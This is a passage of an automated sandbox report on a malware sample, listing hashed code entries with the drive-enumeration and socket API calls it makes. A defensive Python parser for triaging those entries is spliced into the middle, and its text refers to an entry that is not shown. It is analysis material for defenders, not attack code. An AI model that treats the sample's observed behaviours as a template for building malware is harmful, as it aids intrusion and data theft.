                                                              • Opcode Fuzzy Hash: 0077ce1a48bd13f7965de2cac1ccf669b787ac9839ad1c930a85bfd81494303e
                                                              • Instruction Fuzzy Hash: 6E21A4E71EC222AD725294941B78DFF266EE5D7330B30872AB413C7646E6C44E465131
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 4de8bc77a097b45b4b0f8951cdd77fbf37d7d94cab824d601e5263f9696bf739
                                                              • Instruction ID: cd1e16ce0b2a1563210039c7087ccf5d1a47fcdf06a85cf0d94561ae924da2cf
                                                              • Opcode Fuzzy Hash: 4de8bc77a097b45b4b0f8951cdd77fbf37d7d94cab824d601e5263f9696bf739
                                                              • Instruction Fuzzy Hash: 8011D2F621C254EEB205C5526B10AFE2B6CEBC3730F35CA7BF4A6C6105D66499898531
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 6259dc5db7ade6f05470da402b9c096d94bb1ef971530a5e726ab9c6cc47d657
                                                              • Instruction ID: 6867eed94266180148841da75d4d2b7d587fbce7518d6be9edcb68a7043febd7
                                                              • Opcode Fuzzy Hash: 6259dc5db7ade6f05470da402b9c096d94bb1ef971530a5e726ab9c6cc47d657
                                                              • Instruction Fuzzy Hash: C211D6F621C250EEB202C6516A109FE2B7CEBC3630B31C66BF4E6C6105D66489C99632
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c34b133836f7252134c5ccd1a7e3df01e41696710488f9a5f08bce04819d033
                                                              • Instruction ID: 7af73bada21d5c1003f6cacb9f0147e0bf7abe54a07665710e967d8d46cf5472
                                                              • Opcode Fuzzy Hash: 2c34b133836f7252134c5ccd1a7e3df01e41696710488f9a5f08bce04819d033
                                                              • Instruction Fuzzy Hash: 7F2164B250D3C19ED70796705A545FA7FB4AEC321072A82EFE0E2CA117E218988DC332
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: e093bc70270d71ac4e6f8f616ea71f11f52304ece5418a465f28d6c810bb3bbd
                                                              • Instruction ID: e7618954856a7425d56d96ff1b7b6f954697dd725e104c63f6d4002f4229cfe9
                                                              • Opcode Fuzzy Hash: e093bc70270d71ac4e6f8f616ea71f11f52304ece5418a465f28d6c810bb3bbd
                                                              • Instruction Fuzzy Hash: F901D6F661C214EEA245C652A6545FE3B78EBC3330B31856AF4E7C6101EB64D9898531
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 7e551b80811e9fadc20026765bbd53f005f9806d9c8aa0c3713f8a7633ae2b1e
                                                              • Instruction ID: 9d671785ce8821d2a91749d1db528e0f30bd9f4579543b301f09a145594684f5
                                                              • Opcode Fuzzy Hash: 7e551b80811e9fadc20026765bbd53f005f9806d9c8aa0c3713f8a7633ae2b1e
                                                              • Instruction Fuzzy Hash: 6C0128F660C254EEA349CA5156509FE37ACFBD3320B30856EF4E3C6201D674DD898531
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 8524ddcbec222bf7b42f2bdb5183af368b9e867bf6ca87b3634c7769f44b8b2c
                                                              • Instruction ID: 5c5178db107ffdc7fb2b2d3afdb816234a297d519669617d86f215f15da98424
                                                              • Opcode Fuzzy Hash: 8524ddcbec222bf7b42f2bdb5183af368b9e867bf6ca87b3634c7769f44b8b2c
                                                              • Instruction Fuzzy Hash: A501F9F261C214EEA246CA5156509FE3BA8EBC3630B31C56AF0E6C6101E664D9898531
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 31e7ddbab0541d771338b1d47c9f508c809cf33eea612af0784ab562a8a58310
                                                              • Instruction ID: 9e9dac2a65c7f14c2a097e8f80aad774e45ddca09fa0db7b0cd664fbbedb3747
                                                              • Opcode Fuzzy Hash: 31e7ddbab0541d771338b1d47c9f508c809cf33eea612af0784ab562a8a58310
                                                              • Instruction Fuzzy Hash: 460142F660C394DFE345DA6065505FD3B78DBC3310B35856AF4D1CB105D6649889C271
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 99ee42a4491e7a8ba8dd639165eccd5f6e0bc90836a13fb41d9d1ab2682c0ab2
                                                              • Instruction ID: 02f8008860fcd7c88dc92b2ea0c74238d9b83503d979f467ab3f4caef174c501
                                                              • Opcode Fuzzy Hash: 99ee42a4491e7a8ba8dd639165eccd5f6e0bc90836a13fb41d9d1ab2682c0ab2
                                                              • Instruction Fuzzy Hash: E0F0A4F661C244EEA345CA6156509FE37B8EBD3620B31C9AEF4A3C6205E664988D8631
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 5661bc01ca9241b4573b4a6bb77ad6c9548d58a8aaed9bd4c2c65f58a2c0a983
                                                              • Instruction ID: 7dee074d0c43d95f5e725c96c6da0d34f5539351139f83da7bf2e8b0a7543721
                                                              • Opcode Fuzzy Hash: 5661bc01ca9241b4573b4a6bb77ad6c9548d58a8aaed9bd4c2c65f58a2c0a983
                                                              • Instruction Fuzzy Hash: 4601F9F260C680DFA349C661A6549FD3774EFC3220731C5BFE092CA115DA64998DC631
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 0033AFD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 5e640be061053cf796d16211c7b31431ffd2d0d5bc55c7be6bc1786f4e5ab415
                                                              • Instruction ID: 8e2779d7e29129573b48100c782e24b690a26e8aeb17b230b7b0311637eacf93
                                                              • Opcode Fuzzy Hash: 5e640be061053cf796d16211c7b31431ffd2d0d5bc55c7be6bc1786f4e5ab415
                                                              • Instruction Fuzzy Hash: A3119670808B85D5EB268F18D8427F6F3F8EFD0329F109618E5D942150F7365AC58BC2
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0033A97E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: 017d2c51bbc5c6af8ff4bfd0cafe867fd777b75738ace3c720574131a17204ed
                                                              • Instruction ID: b00ba674066977f06a174732bfca8e3c7749de1c11e56e092a57247b14fbabc5
                                                              • Opcode Fuzzy Hash: 017d2c51bbc5c6af8ff4bfd0cafe867fd777b75738ace3c720574131a17204ed
                                                              • Instruction Fuzzy Hash: B301A272B01B14AFC6148F25DC85B5AF7A5EF84720F068669FA982B361C331AC118BD1
                                                              APIs
                                                              • socket.WS2_32(?,0033B280,00000000,-00000001,00000000,0033B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0033AF66
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
                                                              • Opcode ID: bf0b0742c134f9d91ea5e4593eb28910a98a8639ec3b8d998e4a829969a6c1f1
                                                              • Instruction ID: 15c9db279fa8b4003b4f97af9855ac4ab2fbdb0b6949ad2b1bdbc4e5574eb95c
                                                              • Opcode Fuzzy Hash: bf0b0742c134f9d91ea5e4593eb28910a98a8639ec3b8d998e4a829969a6c1f1
                                                              • Instruction Fuzzy Hash: AEE0EDB2A056216BD6659B58EC449ABF3A9EFC4B20F054A49BC9463214C330AC508BE2
                                                              APIs
                                                              • closesocket.WS2_32(?,00339422,?,?,?,?,?,?,?,?,?,?,?,w32,00708640,00000000), ref: 0033B04D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: 31038a0ed7491fedd7ca43dcc6d36e0f77ab308542def95ce45b1753d48f1515
                                                              • Instruction ID: 7b369f0432dda852532ce40302bd903d15805608d547f24cae5af4f7fd7b894d
                                                              • Opcode Fuzzy Hash: 31038a0ed7491fedd7ca43dcc6d36e0f77ab308542def95ce45b1753d48f1515
                                                              • Instruction Fuzzy Hash: A0D0C23470020157CA288A14C8C4A57B22B7FC0310FAACB68E12C4A150C73BCC838A01
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,002AAF56,?,00000001), ref: 002D67FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: 79498e04bf3d2114ddf467d29d3ebbb7a897d2a68f5be9ea712bf5adade099e6
                                                              • Instruction ID: 51c6bd8fe0380b492677a0af7bca241a7374fac25c3ee312101794ca8da7ecb7
                                                              • Opcode Fuzzy Hash: 79498e04bf3d2114ddf467d29d3ebbb7a897d2a68f5be9ea712bf5adade099e6
                                                              • Instruction Fuzzy Hash: 26C012F1118101EFC60C8714D895A6F76D9DB85355F01582CB04681180EA305990CA16
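Added example (not part of the Joe Sandbox report): a small Python parser for the IDA-plugin entries in this listing, so that the per-function records can be triaged rather than read one by one. It groups entries by API and ref address (the GetLogicalDrives entries above all share ref 07010D77 but carry different Opcode IDs, meaning the plugin hashed different code bytes at the same address across snapshots, which is what self-modifying or freshly unpacked code looks like), flags dump sources the report marks as not PE-backed, and decodes the ioctlsocket command word 8004667E using the Winsock ioctl bit layout (direction, parameter size, group letter, number) and the constants from winsock2.h, where 8004667E is FIONBIO. The sample text is constructed from three entries copied out of this report; the field layout it expects is exactly the one shown on the page.

```python
import re
from collections import defaultdict

# Constructed sample in the report's own layout: two GetLogicalDrives snapshots
# that share one ref address, and one ioctlsocket entry (values copied from the page).
SAMPLE = """\
APIs
• GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
Memory Dump Source
• Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
Similarity
• API ID: DrivesLogical
• String ID:
• Opcode ID: e093bc70270d71ac4e6f8f616ea71f11f52304ece5418a465f28d6c810bb3bbd
• Instruction Fuzzy Hash: F901D6F661C214EEA245C652A6545FE3B78EBC3330B31856AF4E7C6101EB64D9898531
APIs
• GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
Memory Dump Source
• Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
Similarity
• API ID: DrivesLogical
• Opcode ID: 7e551b80811e9fadc20026765bbd53f005f9806d9c8aa0c3713f8a7633ae2b1e
• Instruction Fuzzy Hash: 6C0128F660C254EEA349CA5156509FE37ACFBD3320B30856EF4E3C6201D674DD898531
APIs
• ioctlsocket.WS2_32(?,8004667E,?,?,002AAF56,?,00000001), ref: 002D67FC
Memory Dump Source
• Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
Similarity
• API ID: ioctlsocket
• Opcode ID: 79498e04bf3d2114ddf467d29d3ebbb7a897d2a68f5be9ea712bf5adade099e6
"""

API_RE = re.compile(r"^• (?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"^• (?P<key>[^:]+): ?(?P<value>.*)$")
SRC_RE = re.compile(r"^(?P<file>\S+\.sdmp), Offset: (?P<offset>[0-9A-F]+), based on PE: (?P<pe>true|false)$")

# Winsock ioctl command words as defined in winsock2.h; the bit layout is decoded below.
IOCTL_NAMES = {0x8004667E: "FIONBIO", 0x4004667F: "FIONREAD", 0x40047307: "SIOCATMARK"}
IOC_IN, IOC_OUT = 0x80000000, 0x40000000


def decode_ioctl(cmd):
    """Split a Winsock ioctl word into direction, parameter size, group letter and number."""
    direction = "in" if cmd & IOC_IN else "out" if cmd & IOC_OUT else "void"
    return {"name": IOCTL_NAMES.get(cmd, "unknown"), "dir": direction,
            "size": (cmd >> 16) & 0x7F, "group": chr((cmd >> 8) & 0xFF), "num": cmd & 0xFF}


def parse_entries(text):
    """Return one dict per 'APIs' block: the API calls it lists, its bullet fields and its dump source."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"calls": [], "fields": {}, "source": None}
            entries.append(cur)
        elif cur is not None and line.startswith("•"):
            call = API_RE.match(line)
            if call:
                cur["calls"].append({**call.groupdict(), "args": call["args"].split(",")})
                continue
            field = FIELD_RE.match(line)
            if field:
                cur["fields"][field["key"]] = field["value"]
                if field["key"] == "Source File":
                    src = SRC_RE.match(field["value"])
                    cur["source"] = src.groupdict() if src else None
    return entries


def group_by_ref(entries):
    """Map (api, module, ref address) -> sorted distinct Opcode IDs recorded at that address."""
    seen = defaultdict(set)
    for e in entries:
        for c in e["calls"]:
            seen[(c["api"], c["module"], c["ref"])].add(e["fields"].get("Opcode ID", ""))
    return {k: sorted(v) for k, v in seen.items()}


def triage(text):
    """Findings worth a second look: re-hashed code at one address, non-PE dumps, decoded socket ioctls."""
    entries, findings = parse_entries(text), []

    def note(msg):
        if msg not in findings:
            findings.append(msg)

    for (api, module, ref), ids in group_by_ref(entries).items():
        if len(ids) > 1:
            # Same address, different opcode hash: the code bytes changed between snapshots,
            # which is what self-modifying or freshly unpacked code looks like.
            note(f"{api}.{module} at {ref}: {len(ids)} distinct opcode hashes for one address")
    for e in entries:
        if e["source"] and e["source"]["pe"] == "false":
            note(f"dump {e['source']['file']} (offset {e['source']['offset']}) is not backed by a PE image")
        for c in e["calls"]:
            if c["api"] == "ioctlsocket" and len(c["args"]) > 1 and re.fullmatch(r"[0-9A-F]{8}", c["args"][1]):
                d = decode_ioctl(int(c["args"][1], 16))
                note(f"ioctlsocket cmd {c['args'][1]} = {d['name']} ({d['dir']}, {d['size']}-byte arg, "
                     f"group '{d['group']}', #{d['num']}) at {c['ref']}")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE):
        print(line)
```

To run it over the real report, paste the full "APIs ... Instruction Fuzzy Hash" listing into `SAMPLE` or read it from a file; the parser only relies on the bullet-and-colon layout shown above, and entries whose API line it cannot parse (for example the CloseHandle entry below, which lists no call) are kept with an empty `calls` list rather than dropped.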
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
